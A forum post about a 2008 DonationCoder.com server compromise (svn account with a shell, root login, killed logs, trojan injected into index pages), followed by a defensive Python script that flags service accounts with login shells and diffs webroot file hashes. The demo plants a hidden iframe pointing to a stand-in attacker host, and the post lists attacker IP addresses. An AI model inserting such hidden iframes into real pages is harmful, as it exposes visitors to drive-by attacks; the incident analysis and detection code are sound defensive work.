Official Announcements / Re: Thread about the DonationCoder.com server Shutdown on March 2nd, 2008
« on: March 07, 2008, 01:38 PM »
Quote: It looks like they got in using an exploit in an older version of the Subversion Version Control System (SVN) that I had installed on the server a while ago.
It does look like that, but there is no way to be 100% sure.
The facts are:
- Someone logged into the svn user account (which for some reason had a bash shell bound to it instead of being pointed to /sbin/nologin or something) before logging in as root (timestamps show svn was first)
- The svn user account had " nano /etc/passwd " in its .bash_history. It is safe to assume that they erased the .bash_history on every login, so it will only show the commands they ran on the last login, nothing before that.
- About one hour and a half later, they logged in as root through the front door. According to the ssh logs, it seems they used a valid password. They then went straight to installing their trojan code on the webpage. As far as we can tell, anyway; the .bash_history does show that it wasn't erased, because it had commands in there that we ran before the attack. However, they could easily have manipulated it and only deleted the lines they were responsible for.
- They also killed the log daemons upon login. This adds more uncertainty, since we only have partial information.
- The attackers came from at least 3 different IP addresses:
24.39.219.73
82.201.163.136
62.13.171.41
It's most probably safe to assume that these are also hacked computers.
- The way they infected the pages was by running a script called fr.sh which traversed the directories looking for index.html/htm pages (it also got 2 PHP pages that were not accessible to the public). It seems like it grabbed the code to inject from a file they created (the filename was Script).
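Two of the findings in the post above lend themselves to a concrete check: a service account (svn) that was left with a login shell instead of /sbin/nologin, and an fr.sh-style injector that appended content to every index.html/index.htm (plus a couple of PHP files) under the webroot. The script below is an added example written for this page; it is not the DonationCoder.com server's tooling and not the poster's code. It audits a passwd file for service accounts with an interactive shell, then takes a SHA-256 baseline of the index and PHP files under a webroot and diffs it after a simulated injection. The passwd lines, the webroot layout, the payload and the hostname attacker.invalid are all constructed for the example.

```python
"""Post-incident checks for the scenario in the post above.

Added example, not tooling from DonationCoder.com or the poster. It models two
things the post describes: a service account (svn) left with a login shell
instead of /sbin/nologin, and an fr.sh-style injector that rewrites index.html /
index.htm (and some PHP) files under the webroot. The /etc/passwd content, the
webroot layout and the injected payload are all constructed in memory.
"""
import hashlib
import os
import tempfile

# Shells that deny interactive login. Anything else on a service account is suspect.
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false", "/usr/bin/false"}
# File types the fr.sh script in the post went after.
TARGET_NAMES = {"index.html", "index.htm"}
TARGET_EXTS = {".php"}


def service_accounts_with_login_shell(passwd_text, system_uid_max=999):
    """Return [(user, shell)] for non-root accounts in the system UID range
    whose shell is not one of NOLOGIN_SHELLS (the 'svn had bash' problem)."""
    flagged = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:          # skip blank/malformed lines
            continue
        user, _, uid, _, _, _, shell = fields
        if not uid.isdigit() or int(uid) == 0:
            continue                  # root is expected to have a shell
        if int(uid) <= system_uid_max and shell not in NOLOGIN_SHELLS:
            flagged.append((user, shell))
    return flagged


def _sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def is_target(name):
    return name in TARGET_NAMES or os.path.splitext(name)[1].lower() in TARGET_EXTS


def baseline(webroot):
    """Map relative path -> SHA-256 for every index page and PHP file under webroot."""
    manifest = {}
    for dirpath, _, files in os.walk(webroot):
        for name in files:
            if is_target(name):
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, webroot).replace(os.sep, "/")
                manifest[rel] = _sha256(full)
    return manifest


def compare(old, new):
    """Return (modified, added, removed) relative paths, each sorted."""
    modified = sorted(p for p in old if p in new and old[p] != new[p])
    added = sorted(p for p in new if p not in old)
    removed = sorted(p for p in old if p not in new)
    return modified, added, removed


def demo():
    """Run both checks on constructed data; returns (flagged, modified, added, removed)."""
    # Constructed /etc/passwd: svn has bash, www-data is correctly locked down.
    passwd = "\n".join([
        "root:x:0:0:root:/root:/bin/bash",
        "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin",
        "svn:x:110:110:Subversion:/var/svn:/bin/bash",
        "alice:x:1000:1000:Alice:/home/alice:/bin/bash",
    ])
    flagged = service_accounts_with_login_shell(passwd)

    with tempfile.TemporaryDirectory() as root:
        # Constructed webroot: two index pages, one PHP file, one file fr.sh ignored.
        files = {
            "index.html": "<html><body>home</body></html>\n",
            "blog/index.htm": "<html><body>blog</body></html>\n",
            "admin/config.php": "<?php $db = 'x'; ?>\n",
            "css/style.css": "body { margin: 0 }\n",
        }
        for rel, body in files.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(body)
        before = baseline(root)

        # Simulate the injector: append the contents of a 'Script' file to every
        # index page. The payload is constructed, not the real one from the incident.
        payload = "<iframe src=\"http://attacker.invalid/\" width=0 height=0></iframe>\n"
        for rel in files:
            if rel.rsplit("/", 1)[-1] in TARGET_NAMES:
                with open(os.path.join(root, *rel.split("/")), "a") as fh:
                    fh.write(payload)
        after = baseline(root)
        modified, added, removed = compare(before, after)

    return flagged, modified, added, removed


if __name__ == "__main__":
    flagged, modified, added, removed = demo()
    print("accounts with a login shell:", flagged)
    print("modified:", modified, "added:", added, "removed:", removed)
```

The baseline only helps if it was taken before the compromise and kept somewhere the attacker could not reach (off-box or on read-only media); a manifest stored on the same server is as easy to rewrite as the .bash_history and the log daemons in the post. The UID cutoff of 999 is an assumption about the distribution's system account range; adjust it to match the host.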